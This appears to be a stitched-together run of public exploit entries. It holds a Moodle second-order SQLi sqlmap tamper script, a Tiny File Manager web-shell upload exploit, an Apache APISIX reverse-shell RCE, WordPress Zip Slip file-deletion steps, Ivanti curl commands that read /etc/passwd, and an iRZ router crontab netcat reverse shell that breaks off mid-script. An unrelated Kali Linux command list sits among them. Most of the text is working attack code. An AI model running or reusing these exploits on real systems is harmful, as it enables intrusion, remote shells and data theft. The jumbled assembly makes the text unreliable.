20131129) to 3.11.5+ 2nd Order SQLi Exploit by muffin (@mufinnnnnnn) How to use: 1. Define the variables at the top of the tamper() function, example: username = "teacher's-username" password = "teacher's-password" app_root = "http://127.0.0.1/moodle" course_id = 3 NOTE: the course_id should be a course that your teacher can create badges on 2. Create a file called `req.txt` that looks like the following. Be sure to update the `Host:` field... POST /moodle/badges/criteria_settings.php?badgeid=badge-id-replace-me&add=1&type=6 HTTP/1.1 Host: <your-target-here> Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Connection: close sesskey=sess-key-replace-me&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&field_country=0&agg=2&description%5Btext%5D=&description%5Bformat%5D=1&submitbutton=Save 3. Create a file called `req2.txt` that looks like the following. Again, be sure to update the `Host:` field... POST /moodle/badges/action.php HTTP/1.1 Host: <your-target-here> Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Connection: close id=badge-id-replace-me&activate=1&sesskey=sess-key-replace-me&confirm=1&return=%2Fbadges%2Fcriteria.php%3Fid%3Dbadge_id-replace-me 4. Run the following sqlmap command, make sure the tamper argument is pointing at this file: sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --test-filter='MySQL >= 5.0.12 AND time-based blind (query SLEEP)' --current-user --batch --flush NOTES: - for some reason after the first run sqlmap complains that it cannot fingerprint the db and will refuse to try enumerating anthing else, this is why there is a flush at the end. I'm sure it can be fixed... - you can do error based with this command (if errors are enabled...not likely): sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --level=5 --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --batch --current-user --fresh-queries --flush --test-filter='MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' How it works (briefly): - In order to get our sql query into the database it's necessary to create a badge and add some criteria. It is when adding the critera that the sql-to-be-executed-2nd-order is inserted into the database. Finally, when the badge is enabled the injected sql is executed. - This tamper script does the following: - log in to the app - update cookie/sesskey for both the 1st and 2nd requests - make all the requests necessary to create the badge, right up until adding the critera - sqlmap itself adds the criteria with whatever payload it's testing - sqlmap makes the 2nd call to enable the badge (runs the injected sql) - next time around the tamper script will delete the badge that it last created to prevent have 10000s of badges for the course Analysis of the bug: - see http://muffsec.com/blog/moodle-2nd-order-sqli/ Why?: 1. It's an interesting bug, 2nd order sqli is more rare (or maybe just harder to find?) 2. It's an interesting use of sqlmap. There are some articles talking about using it for 2nd order sqli but the use cases outlined are relatively straightforward. There's a few hacky things being done with sqlmap in this script which others might want to do some day i.e. - using the tamper script to authenticate to the app - updating the Cookie in sqlmap's httpHeader structure - updating the CSRF token (sesskey) in the body of both the 1st and 2nd request 3. I wanted to practice programming/thought it would be fun. Also I didn't want to reinvent the wheel with a standalone exploit when sqlmap is just so darn good at what it does. Thoughts: - The exploit is not optimized, halfway through writing I realized there is a badge duplication feature which would cut the number of requests generated down significantly. There's probably many other ways it could be improved as well - I didn't do much testing...it works on my system... - I would be surprised if anyone ever put a `Teacher` level sqli to practical use - As a bonus, this bug is also usable as a stored xss - Would be cool if moodle's bug bounty paid more than kudos """ def get_user_session(username, password, app_root): """ - logs in to moodle - returns session object, cookie, and sesskey """ s = requests.Session() login_page = "{app_root}/login/index.php".format(app_root=app_root) # make first GET request to get cookie and logintoken r = s.get(login_page, verify=False) try: token = re.findall('logintoken" value="(.*?)"', r.text)[0] except Exception as e: print("[-] did not find logintoken, is the target correct?") print(e) sys.exit(1) payload = {'username': username, 'password': password, 'anchor': '', 'logintoken': token} # make second request to actually log in # also let's us get the sesskey r = s.post(login_page, data=payload, allow_redirects=False, verify=False) # third request for session test which activates the session cookie = r.cookies.get_dict() r = s.get(r.headers['Location'], verify=False) sesskey = re.findall('sesskey":"(.*?)"', r.text)[0] if (len(cookie) == 0): sys.exit("[-] Could not establish session! Are credz correct?") print("[+] Cookie: {} for user \"{}\"".format(cookie, username)) print("[+] sesskey: {} for user \"{}\"".format(sesskey, username)) return s, cookie, sesskey def new_badge1(s, sesskey, app_root, course_id): """ - this is the first request that gets generated when "add a new badge" is clicked. - it returns the `client_id`, `itemid`, and `ctx_id` which are needed on subsequent requests - returns -1 on failure """ target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) # badge type is 2 which is a course badge (rather than a site badge) payload = {'type': 2, 'id': course_id, 'sesskey': sesskey} r = s.post(target_url, data=payload, allow_redirects=False, verify=False) try: client_id = re.findall('"client_id":"(.*?)"', r.text)[0] except Exception as e: print("[-] failed to grab client_id in new_badge1()") print(e) return -1 try: itemid = re.findall('"itemid":(.*?),"', r.text)[0] except Exception as e: print("[-] failed to grab itemid in new_badge1()") print(e) return -1 try: ctx_id = re.findall('&ctx_id=(.*?)&', r.text)[0] except Exception as e: print("[-] failed to grab ctx_id in new_badge1()") print(e) return -1 return client_id, itemid, ctx_id def image_signin(s, sesskey, app_root, client_id, itemid, ctx_id): """ - sadly, in order to create a badge we have to associate an image - this request adds an image which is a moodle logo from wikimedia - returns sourcekey on success - return -1 on failure """ target_url = "{app_root}/repository/repository_ajax.php?action=signin".format(app_root=app_root) # repo id 6 is for when we are downloading an image payload = {'file': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png', 'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', 'accepted_types[]': '.gif', 'accepted_types[]': '.jpe', 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', 'accepted_types[]': '.png', 'sesskey': sesskey, 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', 'areamaxbytes': '-1', 'ctx_id': ctx_id} r = s.post(target_url, data=payload, allow_redirects=False, verify=False) try: sourcekey = re.findall('"sourcekey":"(.*?)","', r.text)[0] except Exception as e: print("[-] failed to grab sourcekey in image_signin()") print(e) return -1 return sourcekey def image_download(s, sesskey, app_root, client_id, itemid, ctx_id, sourcekey): """ - continues the image flow started in image_signin(), here the actual download happens - returns image_id on success - return -1 on failure """ target_url = "{app_root}/repository/repository_ajax.php?action=download".format(app_root=app_root) # repo id 6 is for when we are downloading from an image from a URL payload = {'repo_id': '6', 'p': '', 'page': '', 'env': 'filepicker', 'accepted_types[]': '.gif', 'accepted_types[]': '.jpe', 'accepted_types[]': '.jpeg', 'accepted_types[]': '.jpg', 'accepted_types[]': '.png', 'sesskey': sesskey, 'client_id': client_id, 'itemid': itemid, 'maxbytes': '262144', 'areamaxbytes': '-1', 'ctx_id': ctx_id, 'title': '512px-Moodle-logo.svg.png', 'source': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png', 'savepath': '/', 'sourcekey': sourcekey, 'license': 'unknown', 'author': 'moodle-hax'} r = s.post(target_url, data=payload, allow_redirects=False, verify=False) try: image_id = re.findall(',"id":(.*?),"file', r.text)[0] except Exception as e: print("[-] failed to grab image_id in image_download()") print(e) return -1 return image_id def new_badge2(s, sesskey, app_root, course_id, image_id, name="sqlmap-badge", description="sqlmap-description"): """ - finally we are actually creating the badge """ target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root) # badge type is 2 which is a course badge (rather than a site badge) payload = {'type': '2', 'id': course_id, 'action': 'new', 'sesskey': sesskey, '_qf__core_badges_form_badge': '1', 'mform_isexpanded_id_badgedetails': '1', 'mform_isexpanded_id_issuancedetails': '1', 'name': name, 'version': '', 'language': 'en', 'description': description, 'image': image_id, 'imageauthorname': '', 'imageauthoremail': '', 'imageauthorurl': '', 'imagecaption': '', 'expiry': '0', 'submitbutton': 'Create+badge'} r = s.post(target_url, data=payload, allow_redirects=False, verify=False) try: badge_id = re.findall('badges/criteria.php\?id=(.*?)"', r.text)[0] except Exception as e: #print("[-] failed to grab badge_id in new_badge2()") #print(e) return -1 return badge_id def delete_badge(s, sesskey, app_root, course_id, badge_id): """ - delete the badge """ target_url = "{app_root}/badges/index.php".format(app_root=app_root) # badge type is 2 which is a course badge (rather than a site badge) payload = {'sort': 'name', 'dir': 'ASC', 'page': '0', 'type': '2', 'id': course_id, 'delete': badge_id, 'confirm': '1', 'sesskey': sesskey} # TODO: add validation logic r = s.post(target_url, data=payload, allow_redirects=False, verify=False) def tamper(payload, **kwargs): username = "teacher" password = "password" app_root = "http://127.0.0.1/moodle" course_id = 3 # check if cookie is set # cookie should not be set in the request file or this script will fail # https://stackoverflow.com/questions/946860/using-pythons-list-index-method-on-a-list-of-tuples-or-objects try: cookie_index = [x[0] for x in conf.httpHeaders].index('Cookie') except ValueError: # if no cookie is found we run the session initialization routine s, cookie, sesskey = get_user_session(username, password, app_root) # this updates the sqlmap cookie conf.httpHeaders.append(('Cookie', 'MoodleSession={}'.format(cookie['MoodleSession']))) # here we're making our own global variable to hold the sesskey and session object conf.sesskey = sesskey conf.s = s # check if a badge_id is set, if so delete it before making the new one try: conf.badge_id is None delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id) except AttributeError: # we should only hit this on the very first run # we hit the AttributeError because conf.badge_id doesn't exist yet pass # ## do all the badge creation flow up the point of adding the criteria # client_id, itemid, ctx_id = new_badge1(conf.s, conf.sesskey, app_root, course_id) sourcekey = image_signin(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id) image_id = image_download(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id, sourcekey) # we need to store the badge_id globally conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id) # - if badge creation failed try deleting the last known badgeid # - it's most likely failing because a badge already exists with the same name # - yes, it's ugly # - if you control+c and there is a badge with some BS criteria you will # only see an error on the badge management page and won't be # able to delete it through moodle # - if the trouble badgeid is known it can be deleted to resolve the issue if (conf.badge_id == -1): with open("/tmp/last-known-badge-id", "r") as f: conf.badge_id = f.read() delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id) conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id) if (conf.badge_id == -1): sys.exit("[-] ya done fucked up...") with open("/tmp/last-known-badge-id", "w") as f: f.write(conf.badge_id) # - update the sesskey and badge_id in the body of the requests # - it seems necessary to update both the conf.parameters and conf.paramDict structures post = ("sesskey={sesskey}&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&" "mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&" "field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&" "field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&" "field_country=0&agg=2&description[text]=&description[format]=1&submitbutton=Save".format(sesskey=conf.sesskey)) get = "badgeid={badge_id}&add=1&type=6".format(badge_id=conf.badge_id) conf.parameters = {'(custom) POST': post, 'GET': get, 'Host': conf.parameters['Host'], 'Referer': conf.parameters['Referer'], 'User-Agent': conf.parameters['User-Agent']} conf.paramDict = {'(custom) POST': OrderedDict([('#1*', post)]), 'GET': OrderedDict([('badgeid', conf.badge_id), ('add', '1'), ('type', '6')]), 'Host': {'Host': conf.parameters['Host']}, 'Referer': {'Referer': '{app_root}/badges/criteria_settings.php'.format(app_root=app_root)}, 'User-Agent': {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' '(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'}} # we need to update values for the second request too secondReq_url = ("id={badge_id}&activate=1&sesskey={sesskey}&" "confirm=1&return=/badges/criteria.php?id={badge_id}".format(badge_id=conf.badge_id, sesskey=conf.sesskey)) kb['secondReq'] = ('{app_root}/badges/action.php'.format(app_root=app_root), 'POST', secondReq_url, None, (('Host', app_root.split('/')[2]), ('Content-Type', 'application/x-www-form-urlencoded'), ('Cookie', 'MoodleSession={}'.format(conf.s.cookies.get_dict()['MoodleSession'])), # yes, ugly ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ' (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'))) return payload
  15. HireHackking

    Tiny File Manager 2.4.6 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution (RCE) # Date: 14/03/2022 # Exploit Author: FEBIN MON SAJI # Software Link: https://github.com/prasathmani/tinyfilemanager # Version: Tiny File Manager <= 2.4.6 # Tested on: Ubuntu 20.04 # CVE : CVE-2021-40964 # Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/ #!/bin/bash check(){ which curl if [ $? = 0 ] then printf "[✔] Curl found! \n" else printf "[❌] Curl not found! \n" exit fi which jq if [ $? = 0 ] then printf "[✔] jq found! \n" else printf "[❌] jq not found! \n" exit fi } usage(){ printf " TIny File Manager Authenticated RCE Exploit. By FEBIN $0 <URL> <Admin Username> <Password> Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\" " } log-in(){ URL=$1 admin=$2 pass=$3 cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1) if [ $cookie ] then printf "\n[+] Login Success! Cookie: $cookie \n" else printf "\n[-] Logn Failed! \n" fi URL=${URL} } find_webroot(){ webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" ) if [ $webroot ] then printf "\n[*] Try to Leak Web root directory path \n\n" printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n" else printf "[-] Can't find WEBROOT! Using default /var/www/html \n" webroot="/var/www/html" fi } upload(){ #webroot="/var/www/tiny/" shell="shell$RANDOM.php" echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful" } exploit(){ WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/") upload if [ $? = 0 ] then printf "[+] File Upload Successful! \n" else printf "[-] File Upload Unsuccessful! Exiting! \n" exit 1 fi printf "[+] Checking for the shell \n" curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null if [ $? = 0 ] then printf "[+] Shell found ${WEB_URL}/$shell \n" else printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n" exit 2 fi printf "[+] Getting shell access! \n\n" while true do printf "$> " read cmd curl ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}" done } if [ $1 ] && [ $2 ] && [ $3 ] then check log-in $1 $2 $3 find_webroot exploit else usage fi
  16. HireHackking

    Title: Kali Linux command collection

    HireHackking posted a blog entry in Hacker Technology
    There are thousands of Kali Linux commands. Kali Linux is a similar operating system to other Linux-based operating systems. So the basic Linux commands are similar to their commands. The biggest problem for new users to learn these commands is that they cannot remember clearly and not remember them systematically enough. This article will list the commonly used uses from A~Z. It is convenient for friends to learn. This article is long and recommended to bookmark it and read it! WeChat public account kali hacker notes System Commands in Kali Linux Arch command You can use the arch command to understand the computer architecture. Arch command prints such as "i386, i486, i586, alpha, arm, m68k, mips, sparc, x86_64, etc.". Arp command ARP stands for the address resolution protocol, which is used to find the address of a network neighbor of a given IPv4 address. The arp command is used to display the arp table for your Kali Linux system. You can use this command on other Linux systems as well as on Windows operating systems. Of course, we can use it to accomplish arp fraud arping command The arping command is similar to the ping command, but it works on the Ethernet layer. The arping command gives the results of the reachability and round trip time of the IP address in the local network. arping -i eth0 192.168.123.1 Aspell Command Aspell is a spell checker command in Kali Linux, where you can provide file names or anything from standard input to check for spelling errors. Syntax: aspell check [options] file name aspell -c bbskali.txt awk command The awk command is used to manipulate data and generate reports in scripting language. It allows users to use variables, numeric functions and functions, as well as logical operators. So you can use awk to make some utilities. AWK operations: (a) Scan the file progressively (b) Split each input line into fields (c) Comparison of input lines/fields with patterns (d) Perform operations on matching lines Programming structure: (a) Format output lines (b) Arithmetic and string operations (c) Conditional and loop syntax: awk option 'selection _criteria {action }' input file Output file #Show current memory echo `free |grep -w 'memory'|awk '{print $3}'` The bg command bg command is used to control shell jobs. Used to restore stopped or suspended processes and background processes that are stopped after restart. Bzip2 Bzip2 is a basic utility for compressing and decompressing files Compressed files: bzip2 -z bbskali.txt unzip the file: bzip2 -d 22.txt.bz2 cal command cal command is used to display the calendar The cat command cat command is used to view and edit the content in the file. cat 'New File' #Create a new file or overwrite the data on the required file cat "File Name" #View contents in the file cat "File Name" #Add some data to the file cksum command The cksum command stands for checksum, which is used to calculate the CRC (cyclic redundancy check) and number of bytes for each input file and write it to standard output. Clear command The Clear command is used to clear the terminal screen when the terminal screen becomes full when multiple commands are run in the terminal. Shortcut keys: ctrl+k The cmp command cmp command is used to compare two files byte byte. If the difference is found, it reports the byte and line number where the first difference was found. If no difference is found, by default, cmp returns no output. The basic syntax of cmp command cmp file1.txt file2.txt comm command You can use the comm command to compare two sorted files line by line. Basic syntax for using this command: comm file1.txt file2.txt cp command The cp command is used to copy one or more files from one location to another. If you copy the 22.txt file, root cp 22.txt /root crontab command Timed task command, very powerful function. For details, please read the article in the blog, which I have written before. crontab -e #Edit crontab crontab -l #List the crontab job. crontab -r #Delete crontab. The cut command cut command is used to cut a portion of the row from the specified file or pipeline data and print the result out. Display the 1st and 3rd lines of the file cut -f 1,3 22.txt date command date displays the current date The df command df command stands for Disk Free to report file system disk space usage. diff command The diff command is used to display the differences between two files. diff3 command The Diff3 command is used to display the differences between the three files. dig command Get all information about the DNS of this website. dir command The dir command is used to print a list of contents of a directory. Most Linux users use the ls command instead of the dir command. echo command The echo command is one of the most basic commands in Linux and is used to display messages on the screen. The parameters passed to echo are printed to standard output. echo is usually used in shell scripts to display messages or output results of other commands. echo hello bbskali.cn egrep command The egrep command is used to search for lines matching text patterns in a file. For example: In zi.txt, find out whether there are multiple values of bbskali.cn to use | connection egrep 'bbskali.cn' zi.txt ethtool command If you want to use ethtool to display network usage statistics, please use the following command ethtool -S eth0 whoami command View the current login File-related commands pwd command Used to print working directories. It means "where are you?" The ls command The ls command is used to view files and directories in directories. cd command Switch directory command The mkdir command mkdir command is used to create directories. If you want to create a directory in the current directory, just use the mkdir directory name. mv command The mv command is used in Windows as a cut and paste mv file/folder name Target location {Target location=where you want to move} The mv command is also used to rename files and folders mv old file names new file names The rm command: rm command is used to delete files and folders. In other words, this command is used to delete files and folders. Kali Linux-based commands uname command "uname" stands for (Unix Name), displaying detailed information about the machine name, operating system, and kernel. uptime Used to check how long your system has been running. System uptime, this command can also be used for evidence collection. uptime 14:30:34 up 4:52, 1 user, load average: 0.00, 0.03, 0.00 sort command The lines of the text file can be sorted in ascending order. Use the -r option to sort in descending order. $sort filename.txt #Ascending order $sort -r File name.txt #Downward order free command Display current memory information free -m history command history command is used to view the most recently run commands Advanced Kali Linux System Commands The find command is used to search for files in Linux Find is a command line utility that allows you to search for files and directories in a directory hierarchy based on user-designated expressions and apply user-specified actions to each matching file. For example: find all 22.txt files find -name 22.txt apt-get command apt-get is a package manager for installing, deleting, cleaning, and updating packages. The dpkg command dpkg command is used to install deb files in Kali Linux. You can also use the dpkg command to delete the package. Kali Linux is a Debian-based operating system, so you can install .deb files. Format: dpkg -i package name The du command du command is used to display the amount of disk space used by files and directories. adduser command adduser Add user, that is, add users in Linux. passwd command passwd command to modify password If you modify the root password passwd root usermod command The usermod command is used to modify users in the group. lsb_release command The lsb_relase command is used to check the version of Kali Linux. lsb_release -a SCP Command The scp command is used to securely copy files from one device to another. There are several ways to transfer files from one system to another. But scp copy files through ssh protocol. A system should have an ssh server running. scp [Options] [ user@ ]SRC_HOST:]file1_Path [ user@ ]DEST_HOST:]file2 unzip command The decompression command is equivalent to the right-click of Windows - decompression unzip bbskali.zip Postscript Of course, there are many fun commands in kali, so I won’t talk about them here. For more tutorials, please follow our WeChat official account Kali Hacker Notes.
  17. HireHackking

    Apache APISIX 2.12.1 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE) # Date: 2022-03-16 # Exploit Author: Ven3xy # Vendor Homepage: https://apisix.apache.org/ # Version: Apache APISIX 1.3 – 2.12.1 # Tested on: CentOS 7 # CVE : CVE-2022-24112 import requests import sys class color: HEADER = '\033[95m' IMPORTANT = '\33[35m' NOTICE = '\033[33m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' RED = '\033[91m' END = '\033[0m' UNDERLINE = '\033[4m' LOGGING = '\33[34m' color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] def banner(): run = color_random[6]+'''\n . , _.._ * __*\./ ___ _ \./._ | _ *-+- (_][_)|_) |/'\ (/,/'\[_)|(_)| | | | \n''' run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n''' run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' print(run+run2+run3) if (len(sys.argv) != 4): banner() print("[!] Usage : ./apisix-exploit.py <target_url> <lhost> <lport>") exit() else: banner() target_url = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] headers1 = { 'Host': '127.0.0.1:8080', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'Content-Length': '540', 'Connection': 'close', } headers2 = { 'Host': '127.0.0.1:8080', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'Connection': 'close', } json_data = { 'headers': { 'X-Real-IP': '127.0.0.1', 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Content-Type': 'application/json', }, 'timeout': 1500, 'pipeline': [ { 'path': '/apisix/admin/routes/index', 'method': 'PUT', 'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}', }, ], } response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False) response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)
  18. HireHackking

    Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated) # Date: 02-17-2022 # Exploit Author: Ceylan Bozoğullarından # Blog Post: https://bozogullarindan.com/en/2022/01/wordpress-iq-block-country-1.2.13-admin-arbitray-file-deletion-via-zip-slip/ # Software Link: https://en-gb.wordpress.org/plugins/iq-block-country/ # Version: 1.2.12 # Tested on: Linux # CVE: CVE-2022-0246 (https://wpscan.com/vulnerability/892802b1-26e2-4ce1-be6f-71ce29687776) # Description: iQ Block Country is a Wordpress plugin that allows you to limit access to your website content. It can allow or disallow visitors from defined countries to (parts of) the content of the website. The settings of the plugin can be exported or imported using its backup functionality. An authorized user can import preconfigured settings of the plugin by uploading a zip file. After the uploading process, files in the uploaded zip file are extracted one by one. During the extraction process, existence of a file is checked. If the file exists, it is deleted without any security control by only considering the name of the extracted file. This behavior leads to “Zip Slip” vulnerability. Zip Slip can cause damage by overwriting configuration files or other sensitive resources. In this finding, An attacker can exploit this vulnerability and the behavior of the extraction process, to delete an arbitrary file in the server. For doing this, it is enough to upload a zip file containing a file that is named as the path of a file which is desired to be deleted. The details of the discovery are given below. # Steps To Reproduce: 1. Install and activate the iQ Block Country plugin. 2. Create a test file in the vulnerable system: (e.g. /var/www/html/test.txt) 3. Create a zip file containing a file named as ../../../../test.txt. Absolute path at the end of this process will be: /var/www/html/wp-content/uploads/2022/01/../../../../test.txt 4. Go back to the Wordpress, visit Settings > iQ Block Country > Import/Export tab. 5. Click the “Browse” button and choose the zip file which is created in the Step 3. 6. Click the “Restore settings” button. 7. “Invalid file” message will be appeared but nevermind the message. Check whether the test.txt file is deleted or not.
  19. HireHackking

    Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE) # Date: 20/03/2022 # Exploit Author: d7x # Vendor Homepage: https://www.ivanti.com/ # Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 # Version: CSA 4.6 4.5 - EOF Aug 2021 # Tested on: Linux x86_64 # CVE : CVE-2021-44529 ### This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies @d7x_real https://d7x.promiselabs.net https://www.promiselabs.net ### # cat /etc/passwd curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo # sleep for 10 seconds curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo
  20. HireHackking

    iRZ Mobile Router - CSRF to RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: iRZ Mobile Router - CSRF to RCE # Google Dork: intitle:"iRZ Mobile Router" # Date: 2022-03-18 # Exploit Author: Stephen Chavez & Robert Willis # Vendor Homepage: https://en.irz.ru/ # Software Link: https://github.com/SakuraSamuraii/ez-iRZ # Version: Routers through 2022-03-16 # Tested on: RU21, RU21w, RL21, RU41, RL01 # CVE : CVE-2022-27226 import os import requests import json import subprocess option = "0" def main(): print("####################################################") print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #") print("####################################################") print() print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##") print() print("1. Post Authentication RCE (Needs Credentials)") print("2. CSRF to RCE (No Credentials)") print() runit() def runit(): option = input("Select an option: ") if option == "1": exploit1() elif option == "2": exploit2() else: print("You must select '1' or '2'. Exiting.") def exploit1(): print("## Running Post Auth RCE exploit") print() print() router_ip = input("## Enter the router ip to exploit: ") router_port = int( input("## Enter the victim router web page port (default is 80): ") or "80") router_user = input("## Enter the username for the router login: ") router_pass = input("## Enter the password for the router login: ") LHOST = input("## Enter the LHOST for the router reverse shell: ") LPORT = input("## Enter the LPORT for the router reverse shell: ") router_url = f'http://{router_ip}:{router_port}' nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}' input(nc1_str + "\n\nPress enter once you do") send_json_payload(router_url, router_user, router_pass, LHOST, LPORT) def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port): intro = f'Sending the payload to {router_url}\n' print(intro) payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \ f'{lhost_ip} {lhost_port} ' + \ '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}' payload_json = json.loads(payload_str) s = requests.Session() s.auth = (router_user, router_pass) s.headers.update( {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}) s.headers.update({"X-Requested-With": "XMLHttpRequest"}) s.headers.update({"Origin": router_url}) s.headers.update({"Referer": router_url}) s.post(router_url + "/api/crontab", json=payload_json) exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f' print( "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str) print("To fix TTY: type telnet 0.0.0.0 in the shell") def exploit2(): print("## Running 